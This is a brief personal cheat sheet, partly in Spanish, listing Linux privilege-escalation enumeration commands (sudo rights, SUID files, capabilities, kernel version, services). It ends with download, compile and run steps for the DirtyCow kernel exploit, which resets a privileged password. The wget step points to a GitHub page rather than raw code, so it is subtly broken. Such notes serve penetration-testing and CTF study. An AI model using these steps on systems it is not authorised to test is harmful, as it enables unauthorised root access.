Privilege escalation [in progress]

OS Info

lsb_release -a
getconf LONG_BIT # 32 or 64 bits linux
cat /etc/os-release 
cat /etc/redhat-release # redhat  dists

SUDO Perms && SUID Files && Capabilities

sudo -l # si aparece algo -> https://gtfobins.github.io/

find / \-perm -4000 2>/dev/null # Suid
getcap -r / 2>/dev/null # caps

find / \-user <user> 2>/dev/null # buscar archivos q pertezcan al user x

Kernel enumerate

cat /proc/version
uname -a
+------------+
searchexploit "Linux Kernel X.X"

Services Running

systemctl --type=service --state=running
systemd-cgtop
ps aux
ps -ef
top -n 1
service --status-all

DirtyCow (Linux Kernel <= 3.19.0-73.8)

https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs

wget https://github.com/FireFart/dirtycow/blob/master/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty
./dirty <new-pass>

LinPeass

Last updated